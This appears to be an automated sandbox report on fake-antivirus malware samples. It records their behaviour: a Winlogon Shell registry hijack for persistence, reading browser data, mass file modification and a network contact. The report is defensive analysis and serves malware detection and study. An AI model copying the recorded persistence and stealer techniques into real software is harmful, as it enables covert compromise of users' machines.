SHA256 f9c9d2b92efb80f6d11df52735b8bddd099847cc79ba56650793b21a0923b1cd
SHA512 96635e66d9781ad4d2414271f6a0904cf880ed94fc19186ef4da5f88f24e14ef1591fdc90e27db15a6021847c592688d0034f20e2e50ca93bf8c6db27e8c510a

memory/4200-27-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

memory/4200-28-0x0000000068440000-0x0000000068457000-memory.dmp

memory/4200-33-0x000000006FDC0000-0x000000006FDCE000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:36

Platform

win7-20240220-en

Max time kernel

8s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
LT 94.244.80.60:80 tcp

Files

memory/2368-0-0x0000000000400000-0x000000000057F000-memory.dmp

memory/2368-1-0x00000000003B0000-0x00000000003B1000-memory.dmp

memory/2708-5-0x0000000002E90000-0x0000000002E91000-memory.dmp

memory/2368-4-0x0000000000400000-0x000000000057F000-memory.dmp

memory/2584-6-0x0000000002B30000-0x0000000002B31000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

152s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\icon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File created C:\Program Files (x86)\FileFix Professional 2009\is-F9R86.tmp C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryLetter.dotx C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_btn-back-over-select.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\NavigationRight_ButtonGraphic.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-e..ebargadgetresources_31bf3856ad364e35_6.1.7600.16385_none_88767a95b8bbf001\Gadget_WMC_LogoText.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_c3b9072b536514f6\combo-hover-left.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\PreviousMenuButtonIconSubpi.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ringtonesamples_31bf3856ad364e35_6.1.7600.16385_none_135e536ebbe59c28\Ringtone 10.wma C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..adisc-style-babyboy_31bf3856ad364e35_6.1.7600.16385_none_f13596916b261f67\nav_rightarrow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\Title_select-highlight.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\photograph.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\header-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..sc-style-rectangles_31bf3856ad364e35_6.1.7600.16385_none_258f1924c482b7a1\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_black_rainy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-us-component_31bf3856ad364e35_6.1.7601.17514_none_b52573ad8e4c2d89\US-wp3.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\circleround_glass.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_image-frame-ImageMask.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\cronometer_s.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-e..ebargadgetresources_31bf3856ad364e35_6.1.7600.16385_none_88767a95b8bbf001\logo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_gray_snow.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\Perf_Scenes_Mask1.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\btn-next-static.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\25.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\1047x576black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-full_31bf3856ad364e35_6.1.7600.16385_none_ce3a164d3f0fa152\dotsdarkoverlay.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-cpu_31bf3856ad364e35_6.1.7600.16385_none_a79a90daaf5bbeef\glass.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\buttonUp_On.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\rss_headline_glow_flyout.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\2.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\NavigationLeft_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..inboxgames-shanghai_31bf3856ad364e35_6.1.7600.16385_none_1c98ed5d08db04ce\MahjongMCE.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..oxgames-purbleplace_31bf3856ad364e35_6.1.7600.16385_none_622070221822eb39\PurblePlaceMCE.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Nature\img6.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\(144DPI)grayStateIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
